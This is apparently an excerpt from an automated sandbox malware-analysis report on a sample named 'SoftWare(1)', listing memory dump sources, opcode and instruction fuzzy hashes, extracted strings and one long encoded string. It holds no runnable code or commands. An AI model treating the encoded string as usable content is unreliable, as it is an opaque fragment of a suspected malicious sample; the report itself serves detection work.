                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 16910e3bc0c2ce97d653281f8d967e3a15d8c441b94f3b6b7159375bdbbaaa00
                                                                                      • Instruction ID: 92c41da13ec0e40d7845a77caded83ed72bd029fd2f7de7fb49e50919c92ac23
                                                                                      • Opcode Fuzzy Hash: 16910e3bc0c2ce97d653281f8d967e3a15d8c441b94f3b6b7159375bdbbaaa00
                                                                                      • Instruction Fuzzy Hash: E24182B580521DAFDB10DF6ACC88AEABBB9AF45308F1442DDE419E3A01DB359E459F10
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 80'
                                                                                      • API String ID: 0-28623994
                                                                                      • Opcode ID: 5c054ce56bb87d6bba3e993b9f84c2d95662cc9422fd0b72e30a9e3ad4cd1984
                                                                                      • Instruction ID: d1e13ac49e10da1e10cb4f2115f4427f7e584a9d7ab0b4947d59b59cf484f2a8
                                                                                      • Opcode Fuzzy Hash: 5c054ce56bb87d6bba3e993b9f84c2d95662cc9422fd0b72e30a9e3ad4cd1984
                                                                                      • Instruction Fuzzy Hash: 18C1F376A022058FDF04CF7CD6947DF7BF2AB5A324F209219D911EB794D2365A09CB50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: yy
                                                                                      • API String ID: 0-3648868405
                                                                                      • Opcode ID: dd608d53350f1ff1bd7e054da736f7a894c89abd05431afdef614300187a0d8c
                                                                                      • Instruction ID: 2b7bb8c4c5035a53a010cc2c9530ba3c11d8098f07913e9af0b820c8763d5a6a
                                                                                      • Opcode Fuzzy Hash: dd608d53350f1ff1bd7e054da736f7a894c89abd05431afdef614300187a0d8c
                                                                                      • Instruction Fuzzy Hash: DFB1F6B6A546118FCF08CE7CC4A47DF77E2EB67321F609219D610DBB94CA2A461B9B10
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ti3
                                                                                      • API String ID: 0-3277970681
                                                                                      • Opcode ID: 62c30616b61f5549dcc8ca6eebf053e7cbebdacf013425576afc87707b31ab76
                                                                                      • Instruction ID: abbb16a156d18267a1f345248e9e1c2ac5ba89872bd6de1ae15117712f2251c4
                                                                                      • Opcode Fuzzy Hash: 62c30616b61f5549dcc8ca6eebf053e7cbebdacf013425576afc87707b31ab76
                                                                                      • Instruction Fuzzy Hash: 9FA125B2B541068FCF04CF6CD5C13EF7BF1AB56358F61451AE621EBB51C63A8A098B80
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {416
                                                                                      • API String ID: 0-3086952422
                                                                                      • Opcode ID: 07450f89e562a89d0d1f758ec2b53b001336a7da790b41b2a48f25f3bb9620b6
                                                                                      • Instruction ID: 8c1a60d4aca17777466be5e0739a7e27923cde6352ddff9b884b82ba6b3bd48e
                                                                                      • Opcode Fuzzy Hash: 07450f89e562a89d0d1f758ec2b53b001336a7da790b41b2a48f25f3bb9620b6
                                                                                      • Instruction Fuzzy Hash: 4791D276FA41068FCF04CE6CC9D53EFBBF2AB5A354F50411BD611DB754C62A8A098B90
                                                                                      Strings
                                                                                      • 9aYAAACDz1kh7wnfidWB5aYAAACJy4PjWQnrMfuAw5SIXAyEQUqB+ZsAAAB1toPAAotsJDQPt00AZoXJdBeNVQKQkJBmiQiDwAIPtwqDwgJmhcl172bHAAAAD7cMJGaFyY, xrefs: 6CF5ACF3, 6CF5AE73, 6CF5AEF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 9aYAAACDz1kh7wnfidWB5aYAAACJy4PjWQnrMfuAw5SIXAyEQUqB+ZsAAAB1toPAAotsJDQPt00AZoXJdBeNVQKQkJBmiQiDwAIPtwqDwgJmhcl172bHAAAAD7cMJGaFyY
                                                                                      • API String ID: 0-2615491277
                                                                                      • Opcode ID: 14c48696cb473468c11bcae01632a58af26a740e54266cf290b92def985dca55
                                                                                      • Instruction ID: 065ef603fc991fe6012d88898fe0be87380f9d280da2df23eadb0d7b10205d75
                                                                                      • Opcode Fuzzy Hash: 14c48696cb473468c11bcae01632a58af26a740e54266cf290b92def985dca55
                                                                                      • Instruction Fuzzy Hash: F281E476E446058FCF04CEBCD4D57EF7BF2AB1A324F10511AE911EB780C23A99298B60
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: x`<
                                                                                      • API String ID: 0-1043487406
                                                                                      • Opcode ID: 48d9d815030fc239d70a7332c7fdbfcaaa224dad5b1ee6a7e8b0f13a048dc145
                                                                                      • Instruction ID: 625652e8ad73e455d8639243b44140fc2ff539c3fef5454c2230f6e2e932eae0
                                                                                      • Opcode Fuzzy Hash: 48d9d815030fc239d70a7332c7fdbfcaaa224dad5b1ee6a7e8b0f13a048dc145
                                                                                      • Instruction Fuzzy Hash: 4381F176B042458FCF04CEBCC8907EE7FF1AB6A324F10451ADA11E7B90D63A9918CB91
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapProcess
                                                                                      • String ID:
                                                                                      • API String ID: 54951025-0
                                                                                      • Opcode ID: 76573dec74132a83eba813af9df8a19dde3d1d87c07cfb2e11eaacd6df5c5126
                                                                                      • Instruction ID: ca7454f65ee52bca6f0a127916a0e63090ede522ee86fecf05b957c3eb02ea6c
                                                                                      • Opcode Fuzzy Hash: 76573dec74132a83eba813af9df8a19dde3d1d87c07cfb2e11eaacd6df5c5126
                                                                                      • Instruction Fuzzy Hash: 47A01230B122008B5BC08E35460531A36B8554218030540555010C1120D62041409700
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0dafd26ab361c97a8c7a728a8dcc20dfdf5e1be58f7b219f7ab0619d6ef5b490
                                                                                      • Instruction ID: f7982534154788b83233832f87f106c62860fd332d134df0e6da086041304e43
                                                                                      • Opcode Fuzzy Hash: 0dafd26ab361c97a8c7a728a8dcc20dfdf5e1be58f7b219f7ab0619d6ef5b490
                                                                                      • Instruction Fuzzy Hash: AB22ED76E242058FCB04CFACE5806DEBBF1AF5A314F50812AE914EB794D735A859CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f53974255c661e9172ec21d3e5f9f693a76ef0bd73a05cf4d816ee622cbb5600
                                                                                      • Instruction ID: 755abf6b2e01936fa4f674583c76d311f1bb5aa42fa2ea8e722b280f78252518
                                                                                      • Opcode Fuzzy Hash: f53974255c661e9172ec21d3e5f9f693a76ef0bd73a05cf4d816ee622cbb5600
                                                                                      • Instruction Fuzzy Hash: 8CF1247AA41204CFCB08CEACC6907DFBBF2BB56310F50911AFA25DB758C63599158B41
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c5f19c1703ad830909260aa693c5a0f76851f3722779f089b169d016c4bcc260
                                                                                      • Instruction ID: a422c571e66016daffbde518dc7e446769ac975b0b7dced764c15deade5d3f62
                                                                                      • Opcode Fuzzy Hash: c5f19c1703ad830909260aa693c5a0f76851f3722779f089b169d016c4bcc260
                                                                                      • Instruction Fuzzy Hash: 3ED1F536E441099FCB04CEACD4802EEBFF1EB66355FA4411AEA15E7B58C239C9B5CB11
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d098bec988fa6e1aa790e4143887c96b4f4111a392a280d69252bb8b1ef857d7
                                                                                      • Instruction ID: fd49b9ccacb6156a536d1faca7c8587afa4a959e1c7eb723a5e1eb2c394cb8b0
                                                                                      • Opcode Fuzzy Hash: d098bec988fa6e1aa790e4143887c96b4f4111a392a280d69252bb8b1ef857d7
                                                                                      • Instruction Fuzzy Hash: A6C1F476F542198FCF04CEACC8957CEBBF2AB66315F54511AEA21EB784C23998058B80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ceb10d13f7477519cc1494abea58c5aaa6bb67ac0e22d8fd69ece068cc32e334
                                                                                      • Instruction ID: e11f0a5778a84373d000e8aa1dcef72ab7f743f00dc904628347149c93c6bf24
                                                                                      • Opcode Fuzzy Hash: ceb10d13f7477519cc1494abea58c5aaa6bb67ac0e22d8fd69ece068cc32e334
                                                                                      • Instruction Fuzzy Hash: 60B10F76F002458FCF08DEBCC8917DE7BF2AB2E324F115119D912A7B84C63A9908CB54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d5ccdf27d733394c983ea60aa7b48774ab1fb349ff700cc2a2bf567d7526de84
                                                                                      • Instruction ID: c6654a92317381358af4c209209210a1e9219550dbf3563c6e13862f96b16487
                                                                                      • Opcode Fuzzy Hash: d5ccdf27d733394c983ea60aa7b48774ab1fb349ff700cc2a2bf567d7526de84
                                                                                      • Instruction Fuzzy Hash: 84C16576A15208CFCB04CFACD890A9EBFF2AF5A304F904119E605EB724C735AD1ACB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f47ee0dc320fe679e0ac4cd679f4c86832d22931f804bb9d3ab29c886e58ebb1
                                                                                      • Instruction ID: 401e85c5a45ed7c89cefef00b2bc8d2c6ae2e63fb2b217611de2d62b6a57520c
                                                                                      • Opcode Fuzzy Hash: f47ee0dc320fe679e0ac4cd679f4c86832d22931f804bb9d3ab29c886e58ebb1
                                                                                      • Instruction Fuzzy Hash: 46B1FFB2E606058FCB08DFBCD4957DE7BF2AB5A320F10451AEA11EB794C7364909CB51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 724e777b32c5fab30fec627fe0c3fefa611b2e7b306e0cdd75189ce22c3ea536
                                                                                      • Instruction ID: ebc417e7263d86f9a27d1334b48d1a0e27ff348c88923b14734e84436eb1bf86
                                                                                      • Opcode Fuzzy Hash: 724e777b32c5fab30fec627fe0c3fefa611b2e7b306e0cdd75189ce22c3ea536
                                                                                      • Instruction Fuzzy Hash: 4291BC76EA02098FCB04CFACD4857DFBBF1AF5A320F50412AE911EB794C6399909CB51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d23387675d7c4ce33c564d1ec7dceb5a97d2f5c523b33994e8045f4cdbd9abc0
                                                                                      • Instruction ID: 5c1812964819cd42b555548245c5a54ffc29b82ab0638105c74f9156a0cf4828
                                                                                      • Opcode Fuzzy Hash: d23387675d7c4ce33c564d1ec7dceb5a97d2f5c523b33994e8045f4cdbd9abc0
                                                                                      • Instruction Fuzzy Hash: 38817B72F646058FCF04CE3CC5E57DF7BF6AB26324F21910AD6219BB94C63A4A098B51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 86b2c899f3bb123678c7376c2f0e1547688d8965bf2b4346acf9020f75326259
                                                                                      • Instruction ID: 4c9477212232fedde140c22248ade54476424e5c62aa018a1792840bea3259dc
                                                                                      • Opcode Fuzzy Hash: 86b2c899f3bb123678c7376c2f0e1547688d8965bf2b4346acf9020f75326259
                                                                                      • Instruction Fuzzy Hash: 1E7108B2B546018FDF08CE7CC8E53EF7BE2AB57334F105619C6219B690CA2B460B8B50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f2d5c76576e47c6d64571160471f111ae9e73ff9286f70a06b04c74ea6e2dd9c
                                                                                      • Instruction ID: a3824b32d96c66ae17d04313ae2af4c3aa0e768998008ad966c8e5d903c24aa6
                                                                                      • Opcode Fuzzy Hash: f2d5c76576e47c6d64571160471f111ae9e73ff9286f70a06b04c74ea6e2dd9c
                                                                                      • Instruction Fuzzy Hash: 656168B6E642099FCF08CFBCC5916EEBBF2AB5E310F10812AE905E7764D63599048B51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4d1a691d8cb1e96ab954bad006ac6cf2ecffadf68dd6db9570aed009eedcd4cd
                                                                                      • Instruction ID: 95a27f1420a97e0974ff84f2e40599f9d074e4490077b98061b723ae9d1ebcc3
                                                                                      • Opcode Fuzzy Hash: 4d1a691d8cb1e96ab954bad006ac6cf2ecffadf68dd6db9570aed009eedcd4cd
                                                                                      • Instruction Fuzzy Hash: 15519BB5E102098FCF04CFACC5947DEBBF1FB5A320F10911AD925AB794D33999058BA5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 44b618531c2a590e5fc4854d1e2ca6850edb84164b1145bcaff877bd9b4972d8
                                                                                      • Instruction ID: 67a3f79b2f5113e2b48cc014cdf28050334f102b7184de751f031740c9d613ae
                                                                                      • Opcode Fuzzy Hash: 44b618531c2a590e5fc4854d1e2ca6850edb84164b1145bcaff877bd9b4972d8
                                                                                      • Instruction Fuzzy Hash: 4A51E3B2F192458FCF04CE7CC4947EF7BF1AB6A324F508119D921E7740C23A96098B61

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
